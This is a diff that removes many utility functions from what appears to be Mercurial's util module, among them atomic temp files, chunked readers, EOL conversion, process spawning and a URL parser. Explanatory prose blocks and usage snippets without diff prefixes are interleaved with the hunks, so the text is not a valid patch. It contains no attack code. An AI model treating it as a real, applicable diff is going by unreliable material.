-def fscasesensitive(path):
- """
- Return true if the given path is on a case-sensitive filesystem
-
- Requires a path (like /foo/.hg) ending with a foldable final
- directory component.
- """
- s1 = os.lstat(path)
- d, b = os.path.split(path)
- b2 = b.upper()
- if b == b2:
- b2 = b.lower()
- if b == b2:
- return True # no evidence against case sensitivity
- p2 = os.path.join(d, b2)
- try:
- s2 = os.lstat(p2)
- if s2 == s1:
- return False
- return True
- except OSError:
- return True
-
-try:
- import re2
- _re2 = None
-except ImportError:
- _re2 = False
-
-class _re(object):
- def _checkre2(self):
- global _re2
- try:
- # check if match works, see issue3964
- _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
- except ImportError:
- _re2 = False
-
- def compile(self, pat, flags=0):
- '''Compile a regular expression, using re2 if possible
-
- For best performance, use only re2-compatible regexp features. The
- only flags from the re module that are re2-compatible are
- IGNORECASE and MULTILINE.'''
- if _re2 is None:
- self._checkre2()
- if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
- if flags & remod.IGNORECASE:
- pat = '(?i)' + pat
- if flags & remod.MULTILINE:
- pat = '(?m)' + pat
- try:
- return re2.compile(pat)
- except re2.error:
- pass
- return remod.compile(pat, flags)
-
- @propertycache
- def escape(self):
- '''Return the version of escape corresponding to self.compile.
-
- This is imperfect because whether re2 or re is used for a particular
- function depends on the flags, etc, but it's the best we can do.
- '''
- global _re2
- if _re2 is None:
- self._checkre2()
- if _re2:
- return re2.escape
- else:
- return remod.escape
-
-re = _re()
-
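A sketch of the wrapper in use: compilation transparently prefers re2 when
it is importable and the flags are compatible, and silently falls back to
the stdlib re module otherwise, so callers never need to care which engine
they got:

    pat = re.compile(br'[a-z]+\d', remod.IGNORECASE)
    bool(pat.match(b'Foo1'))    # -> True under either engine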
-_fspathcache = {}
-def fspath(name, root):
- '''Get name in the case stored in the filesystem
-
- The name should be relative to root, and be normcase-ed for efficiency.
-
- Note that this function is unnecessary, and should not be
- called, for case-sensitive filesystems (simply because it's expensive).
-
- The root should be normcase-ed, too.
- '''
- def _makefspathcacheentry(dir):
- return dict((normcase(n), n) for n in os.listdir(dir))
-
- seps = pycompat.ossep
- if pycompat.osaltsep:
- seps = seps + pycompat.osaltsep
- # Protect backslashes. This gets silly very quickly.
-    seps = seps.replace('\\', '\\\\')
- pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
- dir = os.path.normpath(root)
- result = []
- for part, sep in pattern.findall(name):
- if sep:
- result.append(sep)
- continue
-
- if dir not in _fspathcache:
- _fspathcache[dir] = _makefspathcacheentry(dir)
- contents = _fspathcache[dir]
-
- found = contents.get(part)
- if not found:
-            # retry "once per directory" per "dirstate.walk" which
-            # may take place for each patch of "hg qpush", for example
- _fspathcache[dir] = contents = _makefspathcacheentry(dir)
- found = contents.get(part)
-
- result.append(found or part)
- dir = os.path.join(dir, part)
-
- return ''.join(result)
-
-def checknlink(testfile):
- '''check whether hardlink count reporting works properly'''
-
- # testfile may be open, so we need a separate file for checking to
- # work around issue2543 (or testfile may get lost on Samba shares)
- f1, f2, fp = None, None, None
- try:
- fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
- suffix='1~', dir=os.path.dirname(testfile))
- os.close(fd)
- f2 = '%s2~' % f1[:-2]
-
- oslink(f1, f2)
- # nlinks() may behave differently for files on Windows shares if
- # the file is open.
- fp = posixfile(f2)
- return nlinks(f2) > 1
- except OSError:
- return False
- finally:
- if fp is not None:
- fp.close()
- for f in (f1, f2):
- try:
- if f is not None:
- os.unlink(f)
- except OSError:
- pass
-
-def endswithsep(path):
-    '''Check whether path ends with os.sep or os.altsep.'''
- return (path.endswith(pycompat.ossep)
- or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
-
-def splitpath(path):
-    '''Split path by os.sep.
-    Note that this function does not use os.altsep because it is
-    meant as a simple alternative to "xxx.split(os.sep)".
-    It is recommended to use os.path.normpath() before using this
-    function if needed.'''
- return path.split(pycompat.ossep)
-
-def gui():
- '''Are we running in a GUI?'''
- if pycompat.isdarwin:
- if 'SSH_CONNECTION' in encoding.environ:
- # handle SSH access to a box where the user is logged in
- return False
- elif getattr(osutil, 'isgui', None):
- # check if a CoreGraphics session is available
- return osutil.isgui()
- else:
- # pure build; use a safe default
- return True
- else:
- return pycompat.iswindows or encoding.environ.get("DISPLAY")
-
-def mktempcopy(name, emptyok=False, createmode=None):
- """Create a temporary file with the same contents from name
-
- The permission bits are copied from the original file.
-
- If the temporary file is going to be truncated immediately, you
- can use emptyok=True as an optimization.
-
- Returns the name of the temporary file.
- """
- d, fn = os.path.split(name)
- fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
- os.close(fd)
- # Temporary files are created with mode 0600, which is usually not
- # what we want. If the original file already exists, just copy
- # its mode. Otherwise, manually obey umask.
- copymode(name, temp, createmode)
- if emptyok:
- return temp
- try:
- try:
- ifp = posixfile(name, "rb")
- except IOError as inst:
- if inst.errno == errno.ENOENT:
- return temp
- if not getattr(inst, 'filename', None):
- inst.filename = name
- raise
- ofp = posixfile(temp, "wb")
- for chunk in filechunkiter(ifp):
- ofp.write(chunk)
- ifp.close()
- ofp.close()
- except: # re-raises
- try:
- os.unlink(temp)
- except OSError:
- pass
- raise
- return temp
-
-class filestat(object):
- """help to exactly detect change of a file
-
-    The 'stat' attribute is the result of 'os.stat()' if the specified
-    'path' exists; otherwise it is None. This avoids a preparatory
-    'exists()' check on the client side of this class.
- """
- def __init__(self, stat):
- self.stat = stat
-
- @classmethod
- def frompath(cls, path):
- try:
- stat = os.stat(path)
- except OSError as err:
- if err.errno != errno.ENOENT:
- raise
- stat = None
- return cls(stat)
-
- @classmethod
- def fromfp(cls, fp):
- stat = os.fstat(fp.fileno())
- return cls(stat)
-
- __hash__ = object.__hash__
-
- def __eq__(self, old):
- try:
- # if ambiguity between stat of new and old file is
- # avoided, comparison of size, ctime and mtime is enough
- # to exactly detect change of a file regardless of platform
- return (self.stat.st_size == old.stat.st_size and
- self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
- self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
- except AttributeError:
- pass
- try:
- return self.stat is None and old.stat is None
- except AttributeError:
- return False
-
- def isambig(self, old):
- """Examine whether new (= self) stat is ambiguous against old one
-
- "S[N]" below means stat of a file at N-th change:
-
- - S[n-1].ctime < S[n].ctime: can detect change of a file
- - S[n-1].ctime == S[n].ctime
- - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
- - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
- - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
- - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
-
-        Case (*2) above means that a file was changed twice or more
-        within the same second (= S[n-1].ctime), so comparison of
-        timestamps is ambiguous.
-
-        The basic idea to avoid such ambiguity is to "advance mtime
-        by 1 sec if the timestamp is ambiguous".
-
- But advancing mtime only in case (*2) doesn't work as
- expected, because naturally advanced S[n].mtime in case (*1)
- might be equal to manually advanced S[n-1 or earlier].mtime.
-
-        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
-        treated as ambiguous regardless of mtime, to avoid overlooking
-        changes caused by such mtime collisions.
-
- Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
- S[n].mtime", even if size of a file isn't changed.
- """
- try:
- return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
- except AttributeError:
- return False
-
- def avoidambig(self, path, old):
- """Change file stat of specified path to avoid ambiguity
-
- 'old' should be previous filestat of 'path'.
-
-        Ambiguity avoidance is skipped if the process doesn't have
-        appropriate privileges for 'path'; in that case, this
-        returns False.
-
- Otherwise, this returns True, as "ambiguity is avoided".
- """
- advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
- try:
- os.utime(path, (advanced, advanced))
- except OSError as inst:
- if inst.errno == errno.EPERM:
- # utime() on the file created by another user causes EPERM,
- # if a process doesn't have appropriate privileges
- return False
- raise
- return True
-
- def __ne__(self, other):
- return not self == other
-
-class atomictempfile(object):
- '''writable file object that atomically updates a file
-
- All writes will go to a temporary copy of the original file. Call
- close() when you are done writing, and atomictempfile will rename
- the temporary copy to the original name, making the changes
- visible. If the object is destroyed without being closed, all your
- writes are discarded.
-
- checkambig argument of constructor is used with filestat, and is
- useful only if target file is guarded by any lock (e.g. repo.lock
- or repo.wlock).
- '''
- def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
- self.__name = name # permanent name
- self._tempname = mktempcopy(name, emptyok=('w' in mode),
- createmode=createmode)
- self._fp = posixfile(self._tempname, mode)
- self._checkambig = checkambig
-
- # delegated methods
- self.read = self._fp.read
- self.write = self._fp.write
- self.seek = self._fp.seek
- self.tell = self._fp.tell
- self.fileno = self._fp.fileno
-
- def close(self):
- if not self._fp.closed:
- self._fp.close()
- filename = localpath(self.__name)
- oldstat = self._checkambig and filestat.frompath(filename)
- if oldstat and oldstat.stat:
- rename(self._tempname, filename)
- newstat = filestat.frompath(filename)
- if newstat.isambig(oldstat):
- # stat of changed file is ambiguous to original one
- advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
- os.utime(filename, (advanced, advanced))
- else:
- rename(self._tempname, filename)
-
- def discard(self):
- if not self._fp.closed:
- try:
- os.unlink(self._tempname)
- except OSError:
- pass
- self._fp.close()
-
- def __del__(self):
- if safehasattr(self, '_fp'): # constructor actually did something
- self.discard()
-
- def __enter__(self):
- return self
-
- def __exit__(self, exctype, excvalue, traceback):
- if exctype is not None:
- self.discard()
- else:
- self.close()
-
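Typical use is via the context manager protocol ('somefile' is
illustrative): a clean exit renames the temporary copy over the target in
one step, while an exception discards it and leaves the target untouched:

    with atomictempfile(b'somefile', b'wb') as fp:
        fp.write(b'new contents')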
-def unlinkpath(f, ignoremissing=False):
- """unlink and remove the directory if it is empty"""
- if ignoremissing:
- tryunlink(f)
- else:
- unlink(f)
- # try removing directories that might now be empty
- try:
- removedirs(os.path.dirname(f))
- except OSError:
- pass
-
-def tryunlink(f):
- """Attempt to remove a file, ignoring ENOENT errors."""
- try:
- unlink(f)
- except OSError as e:
- if e.errno != errno.ENOENT:
- raise
-
-def makedirs(name, mode=None, notindexed=False):
- """recursive directory creation with parent mode inheritance
-
- Newly created directories are marked as "not to be indexed by
- the content indexing service", if ``notindexed`` is specified
- for "write" mode access.
- """
- try:
- makedir(name, notindexed)
- except OSError as err:
- if err.errno == errno.EEXIST:
- return
- if err.errno != errno.ENOENT or not name:
- raise
- parent = os.path.dirname(os.path.abspath(name))
- if parent == name:
- raise
- makedirs(parent, mode, notindexed)
- try:
- makedir(name, notindexed)
- except OSError as err:
- # Catch EEXIST to handle races
- if err.errno == errno.EEXIST:
- return
- raise
- if mode is not None:
- os.chmod(name, mode)
-
-def readfile(path):
- with open(path, 'rb') as fp:
- return fp.read()
-
-def writefile(path, text):
- with open(path, 'wb') as fp:
- fp.write(text)
-
-def appendfile(path, text):
- with open(path, 'ab') as fp:
- fp.write(text)
-
-class chunkbuffer(object):
- """Allow arbitrary sized chunks of data to be efficiently read from an
- iterator over chunks of arbitrary size."""
-
- def __init__(self, in_iter):
- """in_iter is the iterator that's iterating over the input chunks."""
- def splitbig(chunks):
- for chunk in chunks:
- if len(chunk) > 2**20:
- pos = 0
- while pos < len(chunk):
- end = pos + 2 ** 18
- yield chunk[pos:end]
- pos = end
- else:
- yield chunk
- self.iter = splitbig(in_iter)
- self._queue = collections.deque()
- self._chunkoffset = 0
-
- def read(self, l=None):
- """Read L bytes of data from the iterator of chunks of data.
- Returns less than L bytes if the iterator runs dry.
-
-        If the size parameter is omitted, read everything."""
- if l is None:
- return ''.join(self.iter)
-
- left = l
- buf = []
- queue = self._queue
- while left > 0:
- # refill the queue
- if not queue:
- target = 2**18
- for chunk in self.iter:
- queue.append(chunk)
- target -= len(chunk)
- if target <= 0:
- break
- if not queue:
- break
-
- # The easy way to do this would be to queue.popleft(), modify the
- # chunk (if necessary), then queue.appendleft(). However, for cases
- # where we read partial chunk content, this incurs 2 dequeue
- # mutations and creates a new str for the remaining chunk in the
- # queue. Our code below avoids this overhead.
-
- chunk = queue[0]
- chunkl = len(chunk)
- offset = self._chunkoffset
-
- # Use full chunk.
- if offset == 0 and left >= chunkl:
- left -= chunkl
- queue.popleft()
- buf.append(chunk)
- # self._chunkoffset remains at 0.
- continue
-
- chunkremaining = chunkl - offset
-
- # Use all of unconsumed part of chunk.
- if left >= chunkremaining:
- left -= chunkremaining
- queue.popleft()
- # offset == 0 is enabled by block above, so this won't merely
- # copy via ``chunk[0:]``.
- buf.append(chunk[offset:])
- self._chunkoffset = 0
-
- # Partial chunk needed.
- else:
- buf.append(chunk[offset:offset + left])
- self._chunkoffset += left
- left -= chunkremaining
-
- return ''.join(buf)
-
-def filechunkiter(f, size=131072, limit=None):
- """Create a generator that produces the data in the file size
- (default 131072) bytes at a time, up to optional limit (default is
- to read all data). Chunks may be less than size bytes if the
- chunk is the last chunk in the file, or the file is a socket or
- some other type of file that sometimes reads less data than is
- requested."""
- assert size >= 0
- assert limit is None or limit >= 0
- while True:
- if limit is None:
- nbytes = size
- else:
- nbytes = min(limit, size)
- s = nbytes and f.read(nbytes)
- if not s:
- break
- if limit:
- limit -= len(s)
- yield s
-
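A minimal sketch of streaming a file in bounded chunks (the path and the
consume() helper are hypothetical):

    with open(b'some/file', 'rb') as fh:
        for chunk in filechunkiter(fh, size=8192, limit=1 << 20):
            consume(chunk)    # sees at most 1 MiB in total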
-class cappedreader(object):
- """A file object proxy that allows reading up to N bytes.
-
- Given a source file object, instances of this type allow reading up to
- N bytes from that source file object. Attempts to read past the allowed
- limit are treated as EOF.
-
- It is assumed that I/O is not performed on the original file object
-    in addition to I/O that is performed by this instance. If it is,
-    state tracking will get out of sync and unexpected results will ensue.
- """
- def __init__(self, fh, limit):
- """Allow reading up to <limit> bytes from <fh>."""
- self._fh = fh
- self._left = limit
-
- def read(self, n=-1):
- if not self._left:
- return b''
-
- if n < 0:
- n = self._left
-
- data = self._fh.read(min(n, self._left))
- self._left -= len(data)
- assert self._left >= 0
-
- return data
-
- def readinto(self, b):
- res = self.read(len(b))
- if res is None:
- return None
-
- b[0:len(res)] = res
- return len(res)
-
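A small sketch of the capped semantics using an in-memory file object:

    import io
    fh = io.BytesIO(b'0123456789')
    reader = cappedreader(fh, 4)
    reader.read()     # -> b'0123'
    reader.read(1)    # -> b'' (limit reached, treated as EOF)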
def stringmatcher(pattern, casesensitive=True):
"""
accepts a string, possibly starting with 're:' or 'literal:' prefix.
@@ -2667,90 +135,6 @@ def ellipsis(text, maxlength=400):
"""Trim string to at most maxlength (default: 400) columns in display."""
return encoding.trim(text, maxlength, ellipsis='...')
-def unitcountfn(*unittable):
- '''return a function that renders a readable count of some quantity'''
-
- def go(count):
- for multiplier, divisor, format in unittable:
- if abs(count) >= divisor * multiplier:
- return format % (count / float(divisor))
- return unittable[-1][2] % count
-
- return go
-
-def processlinerange(fromline, toline):
- """Check that linerange <fromline>:<toline> makes sense and return a
- 0-based range.
-
- >>> processlinerange(10, 20)
- (9, 20)
- >>> processlinerange(2, 1)
- Traceback (most recent call last):
- ...
- ParseError: line range must be positive
- >>> processlinerange(0, 5)
- Traceback (most recent call last):
- ...
- ParseError: fromline must be strictly positive
- """
- if toline - fromline < 0:
- raise error.ParseError(_("line range must be positive"))
- if fromline < 1:
- raise error.ParseError(_("fromline must be strictly positive"))
- return fromline - 1, toline
-
-bytecount = unitcountfn(
- (100, 1 << 30, _('%.0f GB')),
- (10, 1 << 30, _('%.1f GB')),
- (1, 1 << 30, _('%.2f GB')),
- (100, 1 << 20, _('%.0f MB')),
- (10, 1 << 20, _('%.1f MB')),
- (1, 1 << 20, _('%.2f MB')),
- (100, 1 << 10, _('%.0f KB')),
- (10, 1 << 10, _('%.1f KB')),
- (1, 1 << 10, _('%.2f KB')),
- (1, 1, _('%.0f bytes')),
- )
-
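For illustration (output assumes _ is a pass-through, i.e. translations
are disabled), the table picks the first row whose threshold is met, which
sets both the unit and the precision:

    >>> bytecount(4096)
    '4.00 KB'
    >>> bytecount(123456789)
    '118 MB'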
-class transformingwriter(object):
- """Writable file wrapper to transform data by function"""
-
- def __init__(self, fp, encode):
- self._fp = fp
- self._encode = encode
-
- def close(self):
- self._fp.close()
-
- def flush(self):
- self._fp.flush()
-
- def write(self, data):
- return self._fp.write(self._encode(data))
-
-# Matches a single EOL which can either be a CRLF where repeated CR
-# are removed or a LF. We do not care about old Macintosh files, so a
-# stray CR is an error.
-_eolre = remod.compile(br'\r*\n')
-
-def tolf(s):
- return _eolre.sub('\n', s)
-
-def tocrlf(s):
- return _eolre.sub('\r\n', s)
-
-def _crlfwriter(fp):
- return transformingwriter(fp, tocrlf)
-
-if pycompat.oslinesep == '\r\n':
- tonativeeol = tocrlf
- fromnativeeol = tolf
- nativeeolwriter = _crlfwriter
-else:
- tonativeeol = pycompat.identity
- fromnativeeol = pycompat.identity
- nativeeolwriter = pycompat.identity
-
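A sketch of the normalization: a single regex maps every CR*LF run onto
the requested convention, so stray CRs immediately before a LF are folded
away rather than preserved:

    >>> tolf(b'a\r\nb\r\r\n')
    'a\nb\n'
    >>> tocrlf(b'a\nb\n')
    'a\r\nb\r\n'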
def escapestr(s):
# call underlying function of s.encode('string_escape') directly for
# Python 3 compatibility
@@ -2892,178 +276,6 @@ def wrap(line, width, initindent='', han
subsequent_indent=hangindent)
return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
-if (pyplatform.python_implementation() == 'CPython' and
- sys.version_info < (3, 0)):
- # There is an issue in CPython that some IO methods do not handle EINTR
- # correctly. The following table shows what CPython version (and functions)
- # are affected (buggy: has the EINTR bug, okay: otherwise):
- #
- # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
- # --------------------------------------------------
- # fp.__iter__ | buggy | buggy | okay
- # fp.read* | buggy | okay [1] | okay
- #
- # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
- #
- # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
- # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
- #
- # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
- # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
- # CPython 2, because CPython 2 maintains an internal readahead buffer for
- # fp.__iter__ but not other fp.read* methods.
- #
- # On modern systems like Linux, the "read" syscall cannot be interrupted
- # when reading "fast" files like on-disk files. So the EINTR issue only
- # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
- # files approximately as "fast" files and use the fast (unsafe) code path,
- # to minimize the performance impact.
- if sys.version_info >= (2, 7, 4):
- # fp.readline deals with EINTR correctly, use it as a workaround.
- def _safeiterfile(fp):
- return iter(fp.readline, '')
- else:
- # fp.read* are broken too, manually deal with EINTR in a stupid way.
- # note: this may block longer than necessary because of bufsize.
- def _safeiterfile(fp, bufsize=4096):
- fd = fp.fileno()
- line = ''
- while True:
- try:
- buf = os.read(fd, bufsize)
- except OSError as ex:
- # os.read only raises EINTR before any data is read
- if ex.errno == errno.EINTR:
- continue
- else:
- raise
- line += buf
- if '\n' in buf:
- splitted = line.splitlines(True)
- line = ''
- for l in splitted:
- if l[-1] == '\n':
- yield l
- else:
- line = l
- if not buf:
- break
- if line:
- yield line
-
- def iterfile(fp):
- fastpath = True
- if type(fp) is file:
- fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
- if fastpath:
- return fp
- else:
- return _safeiterfile(fp)
-else:
- # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
- def iterfile(fp):
- return fp
-
-def iterlines(iterator):
- for chunk in iterator:
- for line in chunk.splitlines():
- yield line
-
-def expandpath(path):
- return os.path.expanduser(os.path.expandvars(path))
-
-def hgcmd():
- """Return the command used to execute current hg
-
- This is different from hgexecutable() because on Windows we want
-    to avoid things like batch files that open new shell windows, so we
-    get either the python call or the current executable.
- """
- if mainfrozen():
- if getattr(sys, 'frozen', None) == 'macosx_app':
- # Env variable set by py2app
- return [encoding.environ['EXECUTABLEPATH']]
- else:
- return [pycompat.sysexecutable]
- return gethgcmd()
-
-def rundetached(args, condfn):
- """Execute the argument list in a detached process.
-
- condfn is a callable which is called repeatedly and should return
- True once the child process is known to have started successfully.
- At this point, the child process PID is returned. If the child
- process fails to start or finishes before condfn() evaluates to
- True, return -1.
- """
- # Windows case is easier because the child process is either
- # successfully starting and validating the condition or exiting
- # on failure. We just poll on its PID. On Unix, if the child
- # process fails to start, it will be left in a zombie state until
- # the parent wait on it, which we cannot do since we expect a long
- # running process on success. Instead we listen for SIGCHLD telling
- # us our child process terminated.
- terminated = set()
- def handler(signum, frame):
- terminated.add(os.wait())
- prevhandler = None
- SIGCHLD = getattr(signal, 'SIGCHLD', None)
- if SIGCHLD is not None:
- prevhandler = signal.signal(SIGCHLD, handler)
- try:
- pid = spawndetached(args)
- while not condfn():
- if ((pid in terminated or not testpid(pid))
- and not condfn()):
- return -1
- time.sleep(0.1)
- return pid
- finally:
- if prevhandler is not None:
- signal.signal(signal.SIGCHLD, prevhandler)
-
-def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
- """Return the result of interpolating items in the mapping into string s.
-
- prefix is a single character string, or a two character string with
- a backslash as the first character if the prefix needs to be escaped in
- a regular expression.
-
- fn is an optional function that will be applied to the replacement text
- just before replacement.
-
-    escape_prefix is an optional flag that allows using a doubled prefix
-    to escape the prefix character itself.
- """
- fn = fn or (lambda s: s)
- patterns = '|'.join(mapping.keys())
- if escape_prefix:
- patterns += '|' + prefix
- if len(prefix) > 1:
- prefix_char = prefix[1:]
- else:
- prefix_char = prefix
- mapping[prefix_char] = prefix_char
- r = remod.compile(br'%s(%s)' % (prefix, patterns))
- return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
-
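A minimal sketch of plain interpolation (the mapping and input are
illustrative; fn defaults to the identity):

    >>> interpolate(b'%', {b'foo': b'42'}, b'value is %foo')
    'value is 42'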
-def getport(port):
- """Return the port for a given network service.
-
- If port is an integer, it's returned as is. If it's a string, it's
- looked up using socket.getservbyname(). If there's no matching
- service, error.Abort is raised.
- """
- try:
- return int(port)
- except ValueError:
- pass
-
- try:
- return socket.getservbyname(pycompat.sysstr(port))
- except socket.error:
- raise Abort(_("no port number associated with service '%s'") % port)
-
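For illustration, numeric strings pass straight through while service
names are resolved via getservbyname (assuming a standard services
database):

    >>> getport(b'8080')
    8080
    >>> getport(b'http')
    80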
_booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
'0': False, 'no': False, 'false': False, 'off': False,
'never': False}
@@ -3074,1270 +286,3 @@ def parsebool(s):
If s is not a valid boolean, returns None.
"""
return _booleans.get(s.lower(), None)
-
-class url(object):
- r"""Reliable URL parser.
-
- This parses URLs and provides attributes for the following
- components:
-
- <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
-
- Missing components are set to None. The only exception is
- fragment, which is set to '' if present but empty.
-
- If parsefragment is False, fragment is included in query. If
- parsequery is False, query is included in path. If both are
- False, both fragment and query are included in path.
-
- See http://www.ietf.org/rfc/rfc2396.txt for more information.
-
- Note that for backward compatibility reasons, bundle URLs do not
- take host names. That means 'bundle://../' has a path of '../'.
-
- Examples:
-
- >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
- <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
- >>> url(b'ssh://[::1]:2200//home/joe/repo')
- <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
- >>> url(b'file:///home/joe/repo')
- <url scheme: 'file', path: '/home/joe/repo'>
- >>> url(b'file:///c:/temp/foo/')
- <url scheme: 'file', path: 'c:/temp/foo/'>
- >>> url(b'bundle:foo')
- <url scheme: 'bundle', path: 'foo'>
- >>> url(b'bundle://../foo')
- <url scheme: 'bundle', path: '../foo'>
- >>> url(br'c:\foo\bar')
- <url path: 'c:\\foo\\bar'>
- >>> url(br'\\blah\blah\blah')
- <url path: '\\\\blah\\blah\\blah'>
- >>> url(br'\\blah\blah\blah#baz')
- <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
- >>> url(br'file:///C:\users\me')
- <url scheme: 'file', path: 'C:\\users\\me'>
-
- Authentication credentials:
-
- >>> url(b'ssh://joe:xyz@x/repo')
- <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
- >>> url(b'ssh://joe@x/repo')
- <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
-
- Query strings and fragments:
-
- >>> url(b'http://host/a?b#c')
- <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
- >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
- <url scheme: 'http', host: 'host', path: 'a?b#c'>
-
- Empty path:
-
- >>> url(b'')
- <url path: ''>
- >>> url(b'#a')
- <url path: '', fragment: 'a'>
- >>> url(b'http://host/')
- <url scheme: 'http', host: 'host', path: ''>
- >>> url(b'http://host/#a')
- <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
-
- Only scheme:
-
- >>> url(b'http:')
- <url scheme: 'http'>
- """
-
- _safechars = "!~*'()+"
- _safepchars = "/!~*'()+:\\"
- _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
-
- def __init__(self, path, parsequery=True, parsefragment=True):
- # We slowly chomp away at path until we have only the path left
- self.scheme = self.user = self.passwd = self.host = None
- self.port = self.path = self.query = self.fragment = None
- self._localpath = True
- self._hostport = ''
- self._origpath = path
-
- if parsefragment and '#' in path:
- path, self.fragment = path.split('#', 1)
-
- # special case for Windows drive letters and UNC paths
- if hasdriveletter(path) or path.startswith('\\\\'):
- self.path = path
- return
-
- # For compatibility reasons, we can't handle bundle paths as
-        # normal URLs
- if path.startswith('bundle:'):
- self.scheme = 'bundle'
- path = path[7:]
- if path.startswith('//'):
- path = path[2:]
- self.path = path
- return
-
- if self._matchscheme(path):
- parts = path.split(':', 1)
- if parts[0]:
- self.scheme, path = parts
- self._localpath = False
-
- if not path:
- path = None
- if self._localpath:
- self.path = ''
- return
- else:
- if self._localpath:
- self.path = path
- return
-
- if parsequery and '?' in path:
- path, self.query = path.split('?', 1)
- if not path:
- path = None
- if not self.query:
- self.query = None
-
- # // is required to specify a host/authority
- if path and path.startswith('//'):
- parts = path[2:].split('/', 1)
- if len(parts) > 1:
- self.host, path = parts
- else:
- self.host = parts[0]
- path = None
- if not self.host:
- self.host = None
- # path of file:///d is /d
- # path of file:///d:/ is d:/, not /d:/
- if path and not hasdriveletter(path):
- path = '/' + path
-
- if self.host and '@' in self.host:
- self.user, self.host = self.host.rsplit('@', 1)
- if ':' in self.user:
- self.user, self.passwd = self.user.split(':', 1)
- if not self.host:
- self.host = None
-
- # Don't split on colons in IPv6 addresses without ports
- if (self.host and ':' in self.host and
- not (self.host.startswith('[') and self.host.endswith(']'))):
- self._hostport = self.host
- self.host, self.port = self.host.rsplit(':', 1)
- if not self.host:
- self.host = None
-
- if (self.host and self.scheme == 'file' and
- self.host not in ('localhost', '127.0.0.1', '[::1]')):
- raise Abort(_('file:// URLs can only refer to localhost'))
-
- self.path = path
-
- # leave the query string escaped
- for a in ('user', 'passwd', 'host', 'port',
- 'path', 'fragment'):
- v = getattr(self, a)
- if v is not None:
- setattr(self, a, urlreq.unquote(v))
-
- @encoding.strmethod
- def __repr__(self):
- attrs = []
- for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
- 'query', 'fragment'):
- v = getattr(self, a)
- if v is not None:
- attrs.append('%s: %r' % (a, v))
- return '<url %s>' % ', '.join(attrs)
-
- def __bytes__(self):
- r"""Join the URL's components back into a URL string.
-
- Examples:
-
- >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
- 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
- >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
- 'http://user:pw@host:80/?foo=bar&baz=42'
- >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
- 'http://user:pw@host:80/?foo=bar%3dbaz'
- >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
- 'ssh://user:pw@[::1]:2200//home/joe#'
- >>> bytes(url(b'http://localhost:80//'))
- 'http://localhost:80//'
- >>> bytes(url(b'http://localhost:80/'))
- 'http://localhost:80/'
- >>> bytes(url(b'http://localhost:80'))
- 'http://localhost:80/'
- >>> bytes(url(b'bundle:foo'))
- 'bundle:foo'
- >>> bytes(url(b'bundle://../foo'))
- 'bundle:../foo'
- >>> bytes(url(b'path'))
- 'path'
- >>> bytes(url(b'file:///tmp/foo/bar'))
- 'file:///tmp/foo/bar'
- >>> bytes(url(b'file:///c:/tmp/foo/bar'))
- 'file:///c:/tmp/foo/bar'
- >>> print(url(br'bundle:foo\bar'))
- bundle:foo\bar
- >>> print(url(br'file:///D:\data\hg'))
- file:///D:\data\hg
- """
- if self._localpath:
- s = self.path
- if self.scheme == 'bundle':
- s = 'bundle:' + s
- if self.fragment:
- s += '#' + self.fragment
- return s
-
- s = self.scheme + ':'
- if self.user or self.passwd or self.host:
- s += '//'
- elif self.scheme and (not self.path or self.path.startswith('/')
- or hasdriveletter(self.path)):
- s += '//'
- if hasdriveletter(self.path):
- s += '/'
- if self.user:
- s += urlreq.quote(self.user, safe=self._safechars)
- if self.passwd:
- s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
- if self.user or self.passwd:
- s += '@'
- if self.host:
- if not (self.host.startswith('[') and self.host.endswith(']')):
- s += urlreq.quote(self.host)
- else:
- s += self.host
- if self.port:
- s += ':' + urlreq.quote(self.port)
- if self.host:
- s += '/'
- if self.path:
